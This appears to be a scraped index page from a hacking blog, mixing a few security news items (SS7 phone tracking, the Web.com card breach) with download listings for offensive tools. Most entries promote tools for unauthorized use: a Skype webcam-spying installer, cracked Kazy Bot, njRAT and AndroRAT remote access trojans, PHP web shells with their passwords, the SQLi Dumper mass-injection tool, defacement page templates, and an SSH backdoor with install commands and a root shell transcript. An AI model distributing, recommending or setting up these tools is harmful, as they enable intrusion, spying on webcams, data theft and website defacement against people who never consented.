Your GPS Location and Calls Can be Spied Using Network Vulnerability

Yes, you heard it right. It's the dirty truth that’s featuring what is being called the largest privacy breach ever.

Billions of cell phone users are at risk of a vulnerability in the SS7 inter-carrier network that allows hackers and spies agencies to track locations and intercept all voice calls from anywhere in the world.

This is something we already know from the last year's Snowden leaks that explained the National Security Agency (NSA) capabilities to gather nearly 5 Billion records a day on mobile phone locations around the world. 

But, it's worse than we have thought.

The famous Australian TV programme "60 Minutes" demonstrated that it is possible for anyone to track cell phone location and intercept calls and text messages.

This time, not due to a security vulnerability in the phone's operating system, but due to a serious flaw in the very system our cell phones use to communicate with each other around the world – The global signaling system, called SS7.

Read More

up.time 7.5.0 Upload And Execute File Exploit

Read More

up.time 7.5.0 Superadmin Privilege Escalation Exploit

Read More

Web.com Hacked! Credit Card information of 93,000 Customers Compromised

Web.com, a Florida-based web hosting company with up to 3.3 Million customers, has suffered a data breach and may have compromised personal information and credit card data belonging to 93,000 of its clients.

The company on Tuesday confirmed that some unknown hackers had breached one of its computer systems on August 13, 2015, and accessed personal information of nearly 93,000 customers.

Web.com, with the goal to help small businesses succeed online, uncovered the unauthorized activity as part of its ongoing security monitoring and shutdown process.

 

The stolen information includes:

• Credit Card information
• Actual Names associated with the payment cards
• Residential Addresses

Read More

Skype WebCam Hack

Skype (play /'ska?p/) is a proprietary voice-over-Internet Protocol service and software application originally created in 2003 by Swedish entrepreneur Niklas Zennström and his Danish partner Janus Friis. It has been owned by Microsoft since 2011.

Many ppl want to view web cam them partner boy/girl friend after skype release 5.1.x version Pakistani Hacker Created exploit which allow to ppl view Webcam without permission Software usage is easy 

1 -uninstall all skype which u have already installed 

2 - minimum 3 person on convertion call user must be all online in call (many ppl trying to make offline user call to test software not work bcz user need online

3 - skype all use must be on pc online on window or linux Some Os Also support this exploit remove installed dir form to C:Programm file Run Setup of Skype webcam hack and follow the video which exploit creater make  there is 2 file 1 is setup if after installing not workng then run Skype-x.exe file which ll patch skype registry 

http://www.youtube.com/watch?v=yfZkW18b_U0

http://www.mediafire.com/?bg32y6jcqj6x97e

https://www.virustotal.com/file/58bb...is/1349875598/

Read More

Kazy Bot Full Version ( Cracked)(No Port Forward)

step 1 ) upload files from php folder to your hosting's public_html folder
step 2 ) create datebase with name kazybot
step 3 ) import database file to your kazybot database
step 4 ) connect your server from window client
step 5 ) build server.exe with your server address
==+==+==+==+==+==+>Enjoy Hacking<==+==+==+==+==+==+==+==

Download

click to begin

4.43MB .zip

Read More

Hacking ASP.Net Website

The best attacking for asp.net web application hacker handbook.

Download

click to begin

1.3MB .pdf

Read More

The Webapplication Hackers HandBook

Chapter 1  Web Application (In)security 
Chapter 2  Core Defense Mechanisms
Chapter 3  Web Application Technologies 
Chapter 4  Mapping the Application 
Chapter 5  Bypassing Client-Side Controls 
Chapter 6  Attacking Authentication 
Chapter 7  Attacking Session Management 
Chapter 8  Attacking Access Controls 
Chapter 9  Attacking Data Stores 
Chapter 10  Attacking Back-End Components 
Chapter 11  Attacking Application Logic 
Chapter 12  Attacking Users: Cross-Site Scripting 
Chapter 13  Attacking Users: Other Techniques 
Chapter 14  Automating Customized Attacks 
Chapter 15  Exploiting Information Disclosure 
Chapter 16  Attacking Native Compiled Applications 
Chapter 17  Attacking Application Architecture 
Chapter 18  Attacking the Application Server 
Chapter 19  Finding Vulnerabilities in Source Code 
Chapter 20  A Web Application Hacker’s Toolkit 
Chapter 21  A Web Application Hacker’s Methodology 

Download

click to begin

13MB .pdf

Read More

Brute Force Password File Creator

Brute Force password file creator is one  to create large password automatically.This tool is created by Fjux from hackforums.

Download

click to begin

3.37 KB .zip

Read More

404 Not Found Private Shell

when we got the admin access we need to upload shell. After uploading shell we can index deface of a website, server rooting, cpanel cracking etc. There are many php shell like C99, R57 etc. One of the best and secure shell is 404 not found private shell. Without password you can't open it. So if you upload shell in a server without you none can use it.

So what is it?

After uploading shell when you open the shell link you can find a page like this:

After move your mouse cursor and fix it when it get a box for giving a password.

Password for shell -> abc

Download

click to begin

1.7MB .txt

Read More

Injector Team Shell

password for injector team shell -> inj3ct0r

Download

click to begin

1.5MB .txt

Read More

KALI LINUX ASSURING SECURITY BY PENETRATION TESTING 2014

Download

click to begin

1.7MB .zip

Read More

SQLi Dumper - Advanced SQL Injection\Scanner Tool v7.0 Private Version

 

Designed to be automated to find and exploit web security vulnerabilities in mass from worldwide!
It is robust, works in the background threads and is super faster.
Uses an advanced search engine with 10 different online search services.

Last release: 06/23/2014 v.7.0

SQLi Dumper Features:

-Suports 20 methods of SQL Injection;
-Suports Multi. Online search engine (to find the trajects);
-Automated search for data in a bulk URL list;
-Automated analizer and dumper with custom injections points (URL, POST, Cookies, UserLogin or UserPassword);
-Dumper suports dumping data with multi-threading (databases/tables/columns/fetching data);
-Exploiter, Analizer and Dumper suports up to 50x separeted threads;
-Advanced WAF bypass methods;
-Advanced custom query box;
-Dumper can dump large amounts of data, with greats control of delay each request;
-Easy switch vulnerabilities to vulnerabilities (internal database);
-Suports proxies list;
-GeoIP database;
-Advanced Trash System works with millions of urls;
-Admin login finder;
-Standalone .exe (no install).

credit -> http://sqldumper.blogspot.com

 

Download

click to begin

2.2MB .zip

Read More

Word List Download(sites)

Best sites to Download wordlist...

http://cyberwarzone.com/cyberwarfare/pas...word-lists

http://hashcrack.blogspot.de/p/wordlist-...ds_29.html

http://www.skullsecurity.org/wiki/index.php/Passwords

http://packetstormsecurity.org/Crackers/wordlists/

http://www.isdpodcast.com/resources/62k-...-passwords

http://g0tmi1k.blogspot.com/2011/06/dict...lists.html

http://www.md5this.com/tools /wordlists.html

http://www.md5decrypter.co.uk/ downloads.aspx

Read More

SQL Injection Bypassing HandBook

Content writers :-

Chapter I:::

• SQL Injection: What is it?
• SQL Injection: An In-depth Explanation
• Why is it possible to pass SQL queries directly to a database that is hidden behind a firewall and any other security mechanism?
• Is my database at risk to SQL Injection?
• What is the impact of SQL Injection?
• Example of a SQLInjection Attack

WebApplication Firewalls::

• Detecting A WAF
• Prompt Message
• Dotdefender
• Observing HTTP Response

Chapter II

Advanced evasion techniques for defeating SQL injection Input validation mechanisms
Web applications are becoming more and more technically complex. Web applications, their

• Whitespace
• Null Bytes
• SQL Comments
• URL Encoding
• Changing Cases
• Encode to Hex Forbidden
• Replacing keywords technique
• WAF Bypassing – using characters
• HTTP Parameter Pollution (HPP)
• CRLF WAF Bypass technique
• Buffer Overflow bypassing

Chapter III

Let's see the matter in an orderly fashion from the beginning

• See If Site vulnerability Or Not
• Get Column Number
• Bypassing union select
• Get Version
• Group & Concat
• Bypass with Information_schema.tables
• Requested Baypassing

Chapter IIII

Other issues related to the subject

• Null Parameter
• FIND VULNERABLE COLUMNS
• Count(*)
• unhex()
• Get database
•  

Download : MediaFire

Read More

AndroRAT

Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.It has been developed in a team of 4 for a university project. It has been realised in one month. The goal of the application is to give the control of the android system remotely and retrieve informations from it.

Download -

Download

click to begin

1.7MB .zip

Read More

njRAT

The notorious remote access Trojan (RAT) known as njRAT is making a comeback, according to security firms Zscaler and PhishMe.The RAT, developed in .NET, allows attackers to take complete control of an infected device. The malware is capable of logging keystrokes, downloading and executing files, providing remote desktop access, stealing application credentials, and accessing the infected computer’s webcam and microphone.PhishMe reports that njRAT has been distributed over the past period with the aid of spam emails advertising a car changer hack for the “Need for Speed: World” video game. Zscaler also noted that video game cracks and application key generators are often used as lure.

Download Here->

Download

click to begin

1.7MB .zip

Read More

Best Deface pages Collection

Don't Have Time for designing A Deface page .. ?? 
dont worry here you can download Best Deface Pages, 
Just replace the Name and messgae with your own name and message !!
[Click on Download And Copy The Code, Then Use it, for demo you can paste the code on Pastehtml.com

How to edit and save it... ??
All html codes are shared on pastebin, copy it and paste in notepad
then edit it and save as index.html or anyname.html


1- Tiger M@te's Deface Page, 
This Deface page was uploaded on google bangladesh'd domain Google.com.bd
 : Download


2- Happy Birhthday Deface Page 
for making someone's Birthday special =)
 : Download

3- Deface Page For Long Messages + Video 
Designed By Ffessxt Prince indishell
: Download 


4- #opFreedom Plestine, 
Deface page with free palestine message, Designed by The Hackers army
 : Download


5- Lovely deface Page for Your Girlfried or loved one 
This Deface Page was designed by me =)
 : Download


6-Deface Page with dancing firefox script
 : Download


7-Multi colour deface page
 : Download  


8- Simple Black Deface Page 
Designed by Hax root
 : Download


9-Matrix Style Deface Page
Designed by ShOrTy420
 : Download


10-Pro Style Deface Page 
 : Download


9- Awesome  #opFreedom Plestine Page with New Fuctions
this page desgned by Syakila Daniel
 : Download


10- Awesme Matrix style Deface Page 
Designed by coded32 
: Download


11- Romantic deface Page with Roses
designed by Deepak  Carpenter
: Download


12- Deface Page with Jquery 
Designed by Privatex
 : Download


13- #opmegaupload Deface Page
 : Download

14- A Progammer's Deface Page with Love Letter
Designed by Me .. =)
 : Download

source:  http://www.devilcafe.in

Read More

Wordpress Exploit Scanner

This plugin searches the files on your website, and the posts and comments tables of your database for anything suspicious. It also examines your list of active plugins for unusual filenames.
It does not remove anything. That is left to the user to do.
Latest MD5 hash values for Exploit Scanner:

• exploit-scanner.php (1.4.4): 9a4bfd1308559c9622f086ef75aaf531
• hashes-3.7.3.php: c3b48788de101707239c9e652dcdb4b6
• hashes-3.7.4.php: 43709b77e946828ac811065bef976470
• hashes-3.7.5.php: 9dce09d8778aeb5f4f0820e05eea8dac
• hashes-3.7.6.php: 8e9da6704297078c8fa1c87366624d9b
• hashes-3.7.7.php: 58270d3420814e558a077d8b35b9745e
• hashes-3.8.4.php: 8a75d07a382eab4a8d9b3c75d0dd405a
• hashes-3.8.5.php: 8a5b5c3f8b59e32c020a444976812d67
• hashes-3.8.6.php: 06c0fda276e0b7adc39ab2d7fc0f0e08
• hashes-3.8.7.php: 4d271f223b34095835296bffac1d35ea
• hashes-3.9.3.php: d801e2df206eb1978b6f98ca370a3ca8
• hashes-3.9.4.php: bc74640b26084b595970dedd0b80a0ff
• hashes-3.9.5.php: 858f7ed3a0630e1781ec1c5ef2453dfa
• hashes-4.0.2.php: f9c95ba7cb8fda4d6e1b4a4c280a34d4
• hashes-4.0.3.php: 0bcfaee6372c94b11605127ad27747fc
• hashes-4.0.4.php: 3f7e172c2c74480b126d2a73a0cc61c7
• hashes-4.1.php: c1733c9f307496748e3ec0c81a9f239a
• hashes-4.1.1.php: 772fe89e21ebad53cfcd0a68ac02b9f9
• hashes-4.1.2.php: b29aaa82fe791785648cc92081ac2b0e
• hashes-4.1.3.php: 1623611856c135fbe94726c5e77e94c4
• hashes-4.1.4.php: 08fe41a7c524f3757da47debad5bf3a3
• hashes-4.2.php: f7dbff571961db8213b3c892dd5d5949
• hashes-4.2.1.php: 5006775e52e0af2aa67358ceae189c38

Latest SHA1 hash values for Exploit Scanner:

Read More

WordPress Video Gallery 2.8 SQL Injection Vulnerability

Via-> Homelab.it

Read More

WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

Via---> Homelab.it

Read More

sshDoor( one of Best ssh backdoor )

 Usage:

./install passwrod port
./install jancok 33
 

open putty
ssh port : 33 login : root password : jancok
[root@serv ~]# uname -a;id
Linux serv.test.com 2.6.18-53.1.13.el5 #1 SMP Tue Feb 12 13:01:45 EST 20010 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@serv ~]# 

Download:  Here

Read More